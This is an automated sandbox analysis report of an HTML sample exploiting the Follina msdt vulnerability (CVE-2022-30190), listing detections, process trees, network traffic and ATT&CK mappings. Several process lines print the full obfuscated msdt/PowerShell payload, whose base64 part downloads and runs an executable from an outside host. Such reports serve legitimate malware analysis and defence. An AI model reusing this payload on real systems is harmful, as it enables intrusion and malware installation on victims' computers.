
Windows Analysis Report
fbGUvJ4AdV.html

Overview

General Information

Sample Name:fbGUvJ4AdV.html
Analysis ID:696621
MD5:da3469806af3aacbbbd22a763343fff2
SHA1:6d9fd23a4d32a5963c24d39b5402eeaf2a54f093
SHA256:c3afbf5a136b204e16eb6e1cf00cbb03ee36eff42f519f26f1d1d1e58f0b87e1
Tags:CVE-2022-30190, Exploit, html

Detection

Follina CVE-2022-30190
Score:56
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected Microsoft Office Exploit Follina CVE-2022-30190
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
IP address seen in connection with other malware
JavaScript source code contains large arrays or strings with random content potentially encoding malicious code

Classification

  • System is w10x64
  • chrome.exe (PID: 5708 cmdline: C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank MD5: 0FEC2748F363150DC54C1CAFFB1A9408)
    • chrome.exe (PID: 5404 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1948 --field-trial-handle=1740,i,14618335365964935446,5264089186027307751,131072 /prefetch:8 MD5: 0FEC2748F363150DC54C1CAFFB1A9408)
    • msdt.exe (PID: 6208 cmdline: "C:\Windows\system32\msdt.exe" ms-msdt:/Id%20PcwDiagnOstic%20-skIP%20FORCE%20-paraM%20%22It_ReBrOwsefoRfILE=#fbK%20IT_LaunchMethod=ContextMenu%20IT_BrowseForFile=I$(Iex($(Iex('[SYStem.teXT.eNCoDiNG]'+[ChaR]0x3A+[cHaR]58+'UTF8.gEtSTRInG([SYStEm.conVeRT]'+[CHAR]58+[ChAR]58+'fROmbasE64strInG('+[ChaR]0X22+'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'+[Char]34+'))'))))Ti/../../../../../../../../../../.mSi%20%22 MD5: 8BE43BAF1F37DA5AB31A53CA1C07EE0C)
  • chrome.exe (PID: 1108 cmdline: C:\Program Files\Google\Chrome\Application\chrome.exe" "C:\Users\user\Desktop\fbGUvJ4AdV.html MD5: 0FEC2748F363150DC54C1CAFFB1A9408)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000010.00000002.697950028.0000023881AC4000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Follina | Yara detected Microsoft Office Exploit Follina / CVE-2022-30190 | Joe Security | -
00000010.00000002.698155124.0000023881B59000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Follina | Yara detected Microsoft Office Exploit Follina / CVE-2022-30190 | Joe Security | -
00000010.00000002.698121675.0000023881B50000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Follina | Yara detected Microsoft Office Exploit Follina / CVE-2022-30190 | Joe Security | -
No Sigma rule has matched
No Snort rule has matched

        AV Detection

Source: fbGUvJ4AdV.html | Virustotal: Detection: 11%

        Exploits

Source: Yara match | File source: 00000010.00000002.697950028.0000023881AC4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000010.00000002.698155124.0000023881B59000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000010.00000002.698121675.0000023881B50000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Directory created: C:\Program Files\Google\GoogleUpdater
Source: Joe Sandbox View | IP Address: 239.255.255.250
Source: unknown | DNS traffic detected: queries for: clients2.google.com
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49810
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown | Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49810 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown | Network traffic detected: HTTP traffic on port 49756 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49756
Source: global traffic | HTTP traffic detected:
  GET /service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=104.0.5112.81&lang=en-US&acceptformat=crx3&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D0.0.0.0%26installedby%3Dother%26uc%26ping%3Dr%253D-1%2526e%253D1 HTTP/1.1
  Host: clients2.google.com
  Connection: keep-alive
  X-Goog-Update-Interactivity: fg
  X-Goog-Update-AppId: nmmhkkegccagdldgiimedpiccmgmieda
  X-Goog-Update-Updater: chromecrx-104.0.5112.81
  Sec-Fetch-Site: none
  Sec-Fetch-Mode: no-cors
  Sec-Fetch-Dest: empty
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
  Accept-Encoding: gzip, deflate, br
  Accept-Language: en-US,en;q=0.9
Source: unknown | HTTP traffic detected:
  POST /ListAccounts?gpsia=1&source=ChromiumBrowser&json=standard HTTP/1.1
  Host: accounts.google.com
  Connection: keep-alive
  Content-Length: 1
  Origin: https://www.google.com
  Content-Type: application/x-www-form-urlencoded
  Sec-Fetch-Site: none
  Sec-Fetch-Mode: no-cors
  Sec-Fetch-Dest: empty
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
  Accept-Encoding: gzip, deflate, br
  Accept-Language: en-US,en;q=0.9
  Cookie: CONSENT=PENDING+904; AEC=AakniGO7HqlHWlnoY-P22_SwwnNSfVGxlF1NgK5nuj5WLe313NyJi16g7z4; SOCS=CAISHAgCEhJnd3NfMjAyMjA4MDgtMF9SQzEaAmVuIAEaBgiAvOuXBg; NID=511=nUT82hOv6CVwMNqDg-sTtCMJJ6SQ1v_cCpfCpf5nt8EolEbal01GWFyjG01tqWQgh9ciRU880J6nLd2gdbhAJs44PsHAZaVQAFIbrqe2FmFgjrAAK7W9Z8u5LDvwsuZRng98jP6E23SJ4fsPIs326YmnuCwa92dRRCcB6MNeI_o
Source: fbGUvJ4AdV.html | Virustotal: Detection: 11%
Source: C:\Windows\System32\msdt.exe | File created: C:\Users\user\AppData\Local\Temp\msdtadmin
Source: C:\Windows\System32\msdt.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: classification engine | Classification label: mal56.expl.winHTML@39/0@4/9
Source: unknown | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1948 --field-trial-handle=1740,i,14618335365964935446,5264089186027307751,131072 /prefetch:8
Source: unknown | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe" "C:\Users\user\Desktop\fbGUvJ4AdV.html
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: C:\Windows\System32\msdt.exe "C:\Windows\system32\msdt.exe" ms-msdt:/Id%20PcwDiagnOstic%20-skIP%20FORCE%20-paraM%20%22It_ReBrOwsefoRfILE=#fbK%20IT_LaunchMethod=ContextMenu%20IT_BrowseForFile=I$(Iex($(Iex('[SYStem.teXT.eNCoDiNG]'+[ChaR]0x3A+[cHaR]58+'UTF8.gEtSTRInG([SYStEm.conVeRT]'+[CHAR]58+[ChAR]58+'fROmbasE64strInG('+[ChaR]0X22+'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'+[Char]34+'))'))))Ti/../../../../../../../../../../.mSi%20%22
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown (repeated 2 times)
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1948 --field-trial-handle=1740,i,14618335365964935446,5264089186027307751,131072 /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown (repeated 6 times)
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: C:\Windows\System32\msdt.exe "C:\Windows\system32\msdt.exe" ms-msdt:/Id%20PcwDiagnOstic%20-skIP%20FORCE%20-paraM%20%22It_ReBrOwsefoRfILE=#fbK%20IT_LaunchMethod=ContextMenu%20IT_BrowseForFile=I$(Iex($(Iex('[SYStem.teXT.eNCoDiNG]'+[ChaR]0x3A+[cHaR]58+'UTF8.gEtSTRInG([SYStEm.conVeRT]'+[CHAR]58+[ChAR]58+'fROmbasE64strInG('+[ChaR]0X22+'c1RPcC1QUk9jZXNzIC1GT1JDZSAtTkFtZSAnbXNkdCc7JHNZID0gQWRkLVRZcEUgLW1FbUJFUmRFRmluaXRpT04gJ1tEbGxJbXBvcnQoInVSTE1vbi5kTEwiLCBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyIHUsc3RyaW5nIEksc3RyaW5nIGMsdWludCBzUCxJbnRQdHIgVik7JyAtTmFtZSAibHhQIiAtTmFtRVNwQWNlIEtJeCAtUGFzc1RocnU7ICRzWTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cHM6Ly9hLnBvbWYuY2F0L2lwcmlnay5leGUiLCIkZW5WOkFQUERBVEFcQ2JodHIuZXhlIiwwLDApO1NUQVJ0LVNMRWVwKDMpO1J1bkRsbDMyLkVYZSB6aXBmbGRyLmRsbCxSb3V0ZVRoZUNhbGwgIiRFbnY6QVBQREFUQVxDYmh0ci5leGUiO3NUb3AtUFJPQ0VzcyAtZm9SQ0UgLU5hbWUgJ3NkaWFnbmhvc3Qn'+[Char]34+'))'))))Ti/../../../../../../../../../../.mSi%20%22
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown (repeated 17 times)
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: C:\Windows\System32\msdt.exe "C:\Windows\system32\msdt.exe" ms-msdt:/Id%20PcwDiagnOstic%20-skIP%20FORCE%20-paraM%20%22It_ReBrOwsefoRfILE=#fbK%20IT_LaunchMethod=ContextMenu%20IT_BrowseForFile=I$(Iex($(Iex('[SYStem.teXT.eNCoDiNG]'+[ChaR]0x3A+[cHaR]58+'UTF8.gEtSTRInG([SYStEm.conVeRT]'+[CHAR]58+[ChAR]58+'fROmbasE64strInG('+[ChaR]0X22+'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'+[Char]34+'))'))))Ti/../../../../../../../../../../.mSi%20%22
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown (repeated 7 times)
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | File created: C:\Program Files\Google\GoogleUpdater
Source: C:\Windows\System32\msdt.exe | Automated click: Next (repeated 17 times)
Source: C:\Windows\System32\msdt.exe | File opened: C:\Windows\system32\MSFTEDIT.DLL
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Directory created: C:\Program Files\Google\GoogleUpdater
Source: fbGUvJ4AdV.html | String : entropy: 5.72, length: 262, content: "Iex($(Iex('[SYStem.teXT.eNCoDiNG]'+[ChaR]0x3A+[cHaR]58+'UTF8.gEtSTRInG([SYStEm.conVeRT]'+[CHAR]58+[
Source: fbGUvJ4AdV.html | String : entropy: 5.27, length: 145, content: "CBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUo
Source: fbGUvJ4AdV.html | String : entropy: 5.31, length: 116, content: "UCxJbnRQdHIgVik7JyAtTmFtZSAibHhQIiAtTmFtRVNwQWNlIEtJeCAtUGFzc1RocnU7ICRzWTo6VVJMRG93bmxvYWRUb0ZpbGU
Source: fbGUvJ4AdV.html | String : entropy: 5.44, length: 148, content: "RWVwKDMpO1J1bkRsbDMyLkVYZSB6aXBmbGRyLmRsbCxSb3V0ZVRoZUNhbGwgIiRFbnY6QVBQREFUQVxDYmh0ci5leGUiO3NUb3A
Source: C:\Windows\System32\msdt.exe | Window / User API: threadDelayed 2734
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: C:\Windows\System32\msdt.exe "c:\windows\system32\msdt.exe" ms-msdt:/id%20pcwdiagnostic%20-skip%20force%20-param%20%22it_rebrowseforfile=#fbk%20it_launchmethod=contextmenu%20it_browseforfile=i$(iex($(iex('[system.text.encoding]'+[char]0x3a+[char]58+'utf8.getstring([system.convert]'+[char]58+[char]58+'frombase64string('+[char]0x22+'c1rpcc1quk9jzxnzic1gt1jdzsattkftzsanbxnkdcc7jhnzid0gqwrklvrzceuglw1fbujfumrfrmluaxrpt04gj1tebgxjbxbvcnqoinvste1vbi5ktewilcbdagfyu2v0id0gq2hhclnldc5vbmljb2rlkv1wdwjsawmgc3rhdgljigv4dgvybibjbnrqdhigvvjmrg93bmxvywrub0zpbguosw50uhryihusc3ryaw5nieksc3ryaw5nigmsdwludcbzucxjbnrqdhigvik7jyattmftzsaibhhqiiattmftrvnwqwnlietjecatugfzc1rocnu7icrzwto6vvjmrg93bmxvywrub0zpbguomcwiahr0chm6ly9hlnbvbwyuy2f0l2lwcmlnay5leguilcikzw5wokfquerbvefcq2jodhiuzxhliiwwldapo1nuqvj0lvnmrwvwkdmpo1j1bkrsbdmylkvyzsb6axbmbgrylmrsbcxsb3v0zvrozunhbgwgiirfbny6qvbqrefuqvxdymh0ci5leguio3nub3atufjpq0vzcyatzm9sq0uglu5hbwugj3nkawfnbmhvc3qn'+[char]34+'))'))))ti/../../../../../../../../../../.msi%20%22
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: C:\Windows\System32\msdt.exe "c:\windows\system32\msdt.exe" ms-msdt:/id%20pcwdiagnostic%20-skip%20force%20-param%20%22it_rebrowseforfile=#fbk%20it_launchmethod=contextmenu%20it_browseforfile=i$(iex($(iex('[system.text.encoding]'+[char]0x3a+[char]58+'utf8.getstring([system.convert]'+[char]58+[char]58+'frombase64string('+[char]0x22+'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'+[char]34+'))'))))ti/../../../../../../../../../../.msi%20%22
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: C:\Windows\System32\msdt.exe "c:\windows\system32\msdt.exe" ms-msdt:/id%20pcwdiagnostic%20-skip%20force%20-param%20%22it_rebrowseforfile=#fbk%20it_launchmethod=contextmenu%20it_browseforfile=i$(iex($(iex('[system.text.encoding]'+[char]0x3a+[char]58+'utf8.getstring([system.convert]'+[char]58+[char]58+'frombase64string('+[char]0x22+'c1rpcc1quk9jzxnzic1gt1jdzsattkftzsanbxnkdcc7jhnzid0gqwrklvrzceuglw1fbujfumrfrmluaxrpt04gj1tebgxjbxbvcnqoinvste1vbi5ktewilcbdagfyu2v0id0gq2hhclnldc5vbmljb2rlkv1wdwjsawmgc3rhdgljigv4dgvybibjbnrqdhigvvjmrg93bmxvywrub0zpbguosw50uhryihusc3ryaw5nieksc3ryaw5nigmsdwludcbzucxjbnrqdhigvik7jyattmftzsaibhhqiiattmftrvnwqwnlietjecatugfzc1rocnu7icrzwto6vvjmrg93bmxvywrub0zpbguomcwiahr0chm6ly9hlnbvbwyuy2f0l2lwcmlnay5leguilcikzw5wokfquerbvefcq2jodhiuzxhliiwwldapo1nuqvj0lvnmrwvwkdmpo1j1bkrsbdmylkvyzsb6axbmbgrylmrsbcxsb3v0zvrozunhbgwgiirfbny6qvbqrefuqvxdymh0ci5leguio3nub3atufjpq0vzcyatzm9sq0uglu5hbwugj3nkawfnbmhvc3qn'+[char]34+'))'))))ti/../../../../../../../../../../.msi%20%22
MITRE ATT&CK Matrix (techniques matched by signatures carry their match count in parentheses):
Initial Access: Valid Accounts, Default Accounts, Domain Accounts, Local Accounts, Cloud Accounts
Execution: Command and Scripting Interpreter (1), Scripting (1), At (Linux), At (Windows), Cron
Persistence: Path Interception, Boot or Logon Initialization Scripts, Logon Script (Windows), Logon Script (Mac), Network Logon Script
Privilege Escalation: Process Injection (1), Boot or Logon Initialization Scripts, Logon Script (Windows), Logon Script (Mac), Network Logon Script
Defense Evasion: Masquerading (2), Process Injection (1), Scripting (1), Binary Padding, Software Packing
Credential Access: OS Credential Dumping, LSASS Memory, Security Account Manager, NTDS, LSA Secrets
Discovery: Application Window Discovery (1), System Information Discovery (1), Query Registry, System Network Configuration Discovery, Remote System Discovery
Lateral Movement: Remote Services, Remote Desktop Protocol, SMB/Windows Admin Shares, Distributed Component Object Model, SSH
Collection: Data from Local System, Data from Removable Media, Data from Network Shared Drive, Input Capture, Keylogging
Exfiltration: Exfiltration Over Other Network Medium, Exfiltration Over Bluetooth, Automated Exfiltration, Scheduled Transfer, Data Transfer Size Limits
Command and Control: Encrypted Channel (1), Data Encoding (1), Non-Application Layer Protocol (3), Application Layer Protocol (4), Ingress Tool Transfer (1)
Network Effects: Eavesdrop on Insecure Network Communication, Exploit SS7 to Redirect Phone Calls/SMS, Exploit SS7 to Track Device Location, SIM Card Swap, Manipulate Device Communication
Remote Service Effects: Remotely Track Device Without Authorization, Remotely Wipe Data Without Authorization, Obtain Device Cloud Backups, Carrier Billing Fraud, Manipulate App Store Rankings or Ratings
Impact: Modify System Partition, Device Lockout, Delete Device Data
Source | Detection | Scanner | Label
fbGUvJ4AdV.html | 12% | ReversingLabs | Script.Exploit.Heuristic
fbGUvJ4AdV.html | 12% | Virustotal | -
fbGUvJ4AdV.html | 0% | Metadefender | -
No Antivirus matches
Name | IP | Active | Malicious | Antivirus Detection | Reputation
accounts.google.com | 216.58.215.237 | true | false | - | high
www.google.com | 172.217.168.36 | true | false | - | high
clients.l.google.com | 172.217.168.78 | true | false | - | high
clients2.google.com | unknown | unknown | false | - | high
Name | Malicious | Antivirus Detection | Reputation
https://clients2.google.com/service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=104.0.5112.81&lang=en-US&acceptformat=crx3&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D0.0.0.0%26installedby%3Dother%26uc%26ping%3Dr%253D-1%2526e%253D1 | false | - | high
https://accounts.google.com/ListAccounts?gpsia=1&source=ChromiumBrowser&json=standard | false | - | high
IP | Domain | Country | ASN | ASN Name | Malicious
216.58.215.237 | accounts.google.com | United States | 15169 | GOOGLEUS | false
172.217.168.78 | clients.l.google.com | United States | 15169 | GOOGLEUS | false
172.217.168.36 | www.google.com | United States | 15169 | GOOGLEUS | false
239.255.255.250 | unknown | Reserved | unknown | unknown | false
Private / local IPs: 192.168.2.1, 192.168.2.4, 192.168.2.5, 192.168.2.23, 127.0.0.1
Joe Sandbox Version:35.0.0 Citrine
Analysis ID:696621
Start date and time:2022-09-02 15:27:50 +02:00
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 7m 56s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:fbGUvJ4AdV.html
Cookbook file name:default.jbs
Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed:25
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• GSI enabled (Javascript)
• AMSI enabled
Analysis Mode:default
Analysis stop reason:Timeout
Detection:MAL
Classification:mal56.expl.winHTML@39/0@4/9
EGA Information:Failed
HDC Information:Failed
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Found application associated with file extension: .html
• Adjust boot time
• Enable AMSI
• Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe
• Excluded IPs from analysis (whitelisted): 172.217.168.35, 142.250.203.110, 74.125.160.202, 216.58.215.234, 172.217.168.67
• Excluded domains from analysis (whitelisted): r5---sn-4g5e6nzs.gvt1.com, client.wns.windows.com, fs.microsoft.com, r2---sn-4g5e6nzz.gvt1.com, eudb.ris.api.iris.microsoft.com, ctldl.windowsupdate.com, clientservices.googleapis.com, r5---sn-4g5ednsz.gvt1.com, r5.sn-4g5lznez.gvt1.com, arc.msn.com, ris.api.iris.microsoft.com, r4---sn-4g5e6nsk.gvt1.com, redirector.gvt1.com, update.googleapis.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, r5---sn-4g5lznez.gvt1.com, optimizationguide-pa.googleapis.com
• Not all processes were analyzed; the report is missing behavior information
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtWriteVirtualMemory calls found.
No simulations
No created / dropped files found
File type:HTML document, ASCII text, with very long lines, with CRLF line terminators
Entropy (8bit):6.049533660136345
File name:fbGUvJ4AdV.html
File size:19189
MD5:da3469806af3aacbbbd22a763343fff2
SHA1:6d9fd23a4d32a5963c24d39b5402eeaf2a54f093
SHA256:c3afbf5a136b204e16eb6e1cf00cbb03ee36eff42f519f26f1d1d1e58f0b87e1
SHA512:7e0cbfb15bf2bc8bbbb1727ba9bcfc472bad56b6887457be564ab84b1d69c6ad81dc827e1d04cc57f3f3e4255494484073dee58a79a390e08fe3888939730a2d
SSDEEP:384:9W4t9eJgaU7XWH7/hjoNso7qSVUajB+IOFFUD6kNTPhFEsAll:neJgaUShENTHVFVwHM1phFEse
TLSH:A082C0A9D03658346DD45C134A753D96BD20FA75C4BC9B282E4CF72D532D4E1ED8283A
File Content Preview:<!DOctYpE hTmL>....<HtML>....<bodY>....<ScRiPT laNGUAGe="jscripT">....//Nn2wp6S4Yl6LHD8RlkuH2nRrwM4IwiGC2LqC6DJpN8XYHUc8JE1CS322bpIjLLlSzFr2pDpqdRNlULZdgV0m7sAoiC4lFm8MHONeXSmmMbu8RCnbuU8BXfdqJNfW9P9Ywgg9nOxJaWPpgS3g05gaFqEmQGOCbebhz32j6P95K6A0kX8Y1Cv7mnh
Icon Hash:78d0a8cccc88c460
TCP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Sep 2, 2022 15:28:54.879998922 CEST | 49749 | 443 | 192.168.2.3 | 172.217.168.78
Sep 2, 2022 15:28:54.880044937 CEST | 443 | 49749 | 172.217.168.78 | 192.168.2.3
Sep 2, 2022 15:28:54.880124092 CEST | 49749 | 443 | 192.168.2.3 | 172.217.168.78
Sep 2, 2022 15:28:54.880600929 CEST | 49749 | 443 | 192.168.2.3 | 172.217.168.78
Sep 2, 2022 15:28:54.880621910 CEST | 443 | 49749 | 172.217.168.78 | 192.168.2.3
Sep 2, 2022 15:28:54.894287109 CEST | 49750 | 443 | 192.168.2.3 | 216.58.215.237
Sep 2, 2022 15:28:54.894330978 CEST | 443 | 49750 | 216.58.215.237 | 192.168.2.3
Sep 2, 2022 15:28:54.894418001 CEST | 49750 | 443 | 192.168.2.3 | 216.58.215.237
Sep 2, 2022 15:28:54.894710064 CEST | 49750 | 443 | 192.168.2.3 | 216.58.215.237
Sep 2, 2022 15:28:54.894727945 CEST | 443 | 49750 | 216.58.215.237 | 192.168.2.3
Sep 2, 2022 15:28:54.943497896 CEST | 443 | 49749 | 172.217.168.78 | 192.168.2.3
Sep 2, 2022 15:28:54.960045099 CEST | 443 | 49750 | 216.58.215.237 | 192.168.2.3
Sep 2, 2022 15:28:54.989614010 CEST | 49750 | 443 | 192.168.2.3 | 216.58.215.237
Sep 2, 2022 15:28:54.989650965 CEST | 443 | 49750 | 216.58.215.237 | 192.168.2.3
Sep 2, 2022 15:28:54.989794970 CEST | 49749 | 443 | 192.168.2.3 | 172.217.168.78
Sep 2, 2022 15:28:54.989814043 CEST | 443 | 49749 | 172.217.168.78 | 192.168.2.3
Sep 2, 2022 15:28:54.990809917 CEST | 443 | 49749 | 172.217.168.78 | 192.168.2.3
Sep 2, 2022 15:28:54.990840912 CEST | 443 | 49749 | 172.217.168.78 | 192.168.2.3
Sep 2, 2022 15:28:54.990910053 CEST | 49749 | 443 | 192.168.2.3 | 172.217.168.78
Sep 2, 2022 15:28:54.991908073 CEST | 443 | 49750 | 216.58.215.237 | 192.168.2.3
Sep 2, 2022 15:28:54.992002010 CEST | 49750 | 443 | 192.168.2.3 | 216.58.215.237
Sep 2, 2022 15:28:54.993104935 CEST | 443 | 49749 | 172.217.168.78 | 192.168.2.3
Sep 2, 2022 15:28:54.993181944 CEST | 49749 | 443 | 192.168.2.3 | 172.217.168.78
Sep 2, 2022 15:28:54.993199110 CEST | 443 | 49749 | 172.217.168.78 | 192.168.2.3
Sep 2, 2022 15:28:55.175978899 CEST | 49749 | 443 | 192.168.2.3 | 172.217.168.78
Sep 2, 2022 15:28:56.073260069 CEST | 49750 | 443 | 192.168.2.3 | 216.58.215.237
Sep 2, 2022 15:28:56.073594093 CEST | 49750 | 443 | 192.168.2.3 | 216.58.215.237
Sep 2, 2022 15:28:56.073594093 CEST | 443 | 49750 | 216.58.215.237 | 192.168.2.3
Sep 2, 2022 15:28:56.073848963 CEST | 49749 | 443 | 192.168.2.3 | 172.217.168.78
Sep 2, 2022 15:28:56.073986053 CEST | 49749 | 443 | 192.168.2.3 | 172.217.168.78
Sep 2, 2022 15:28:56.074013948 CEST | 443 | 49749 | 172.217.168.78 | 192.168.2.3
Sep 2, 2022 15:28:56.074413061 CEST | 443 | 49749 | 172.217.168.78 | 192.168.2.3
Sep 2, 2022 15:28:56.109338999 CEST | 443 | 49749 | 172.217.168.78 | 192.168.2.3
Sep 2, 2022 15:28:56.109447956 CEST | 49749 | 443 | 192.168.2.3 | 172.217.168.78
Sep 2, 2022 15:28:56.109489918 CEST | 443 | 49749 | 172.217.168.78 | 192.168.2.3
Sep 2, 2022 15:28:56.109589100 CEST | 443 | 49749 | 172.217.168.78 | 192.168.2.3
Sep 2, 2022 15:28:56.109668970 CEST | 49749 | 443 | 192.168.2.3 | 172.217.168.78
Sep 2, 2022 15:28:56.115366936 CEST | 443 | 49750 | 216.58.215.237 | 192.168.2.3
Sep 2, 2022 15:28:56.130569935 CEST | 443 | 49750 | 216.58.215.237 | 192.168.2.3
Sep 2, 2022 15:28:56.130816936 CEST | 49750 | 443 | 192.168.2.3 | 216.58.215.237
Sep 2, 2022 15:28:56.130831957 CEST | 443 | 49750 | 216.58.215.237 | 192.168.2.3
Sep 2, 2022 15:28:56.130899906 CEST | 49750 | 443 | 192.168.2.3 | 216.58.215.237
Sep 2, 2022 15:28:56.146040916 CEST | 49750 | 443 | 192.168.2.3 | 216.58.215.237
Sep 2, 2022 15:28:56.146084070 CEST | 443 | 49750 | 216.58.215.237 | 192.168.2.3
Sep 2, 2022 15:28:56.148969889 CEST | 49749 | 443 | 192.168.2.3 | 172.217.168.78
Sep 2, 2022 15:28:56.148992062 CEST | 443 | 49749 | 172.217.168.78 | 192.168.2.3
Sep 2, 2022 15:28:57.917635918 CEST | 49756 | 443 | 192.168.2.3 | 172.217.168.36
Sep 2, 2022 15:28:57.917695045 CEST | 443 | 49756 | 172.217.168.36 | 192.168.2.3
Sep 2, 2022 15:28:57.917794943 CEST | 49756 | 443 | 192.168.2.3 | 172.217.168.36
Sep 2, 2022 15:28:57.918090105 CEST | 49756 | 443 | 192.168.2.3 | 172.217.168.36
Sep 2, 2022 15:28:57.918113947 CEST | 443 | 49756 | 172.217.168.36 | 192.168.2.3
Sep 2, 2022 15:28:57.978068113 CEST | 443 | 49756 | 172.217.168.36 | 192.168.2.3
Sep 2, 2022 15:28:57.983189106 CEST | 49756 | 443 | 192.168.2.3 | 172.217.168.36
Sep 2, 2022 15:28:57.983237028 CEST | 443 | 49756 | 172.217.168.36 | 192.168.2.3
Sep 2, 2022 15:28:57.984797001 CEST | 443 | 49756 | 172.217.168.36 | 192.168.2.3
Sep 2, 2022 15:28:57.984909058 CEST | 49756 | 443 | 192.168.2.3 | 172.217.168.36
Sep 2, 2022 15:28:57.987863064 CEST | 49756 | 443 | 192.168.2.3 | 172.217.168.36
Sep 2, 2022 15:28:57.988006115 CEST | 443 | 49756 | 172.217.168.36 | 192.168.2.3
Sep 2, 2022 15:28:58.068564892 CEST | 49756 | 443 | 192.168.2.3 | 172.217.168.36
Sep 2, 2022 15:28:58.068614006 CEST | 443 | 49756 | 172.217.168.36 | 192.168.2.3
Sep 2, 2022 15:28:58.181607008 CEST | 49756 | 443 | 192.168.2.3 | 172.217.168.36
Sep 2, 2022 15:29:07.962944984 CEST | 443 | 49756 | 172.217.168.36 | 192.168.2.3
Sep 2, 2022 15:29:07.963063955 CEST | 443 | 49756 | 172.217.168.36 | 192.168.2.3
Sep 2, 2022 15:29:07.963167906 CEST | 49756 | 443 | 192.168.2.3 | 172.217.168.36
Sep 2, 2022 15:29:08.197738886 CEST | 49756 | 443 | 192.168.2.3 | 172.217.168.36
Sep 2, 2022 15:29:08.197777033 CEST | 443 | 49756 | 172.217.168.36 | 192.168.2.3
Sep 2, 2022 15:29:58.076714039 CEST | 49810 | 443 | 192.168.2.3 | 172.217.168.36
Sep 2, 2022 15:29:58.076778889 CEST | 443 | 49810 | 172.217.168.36 | 192.168.2.3
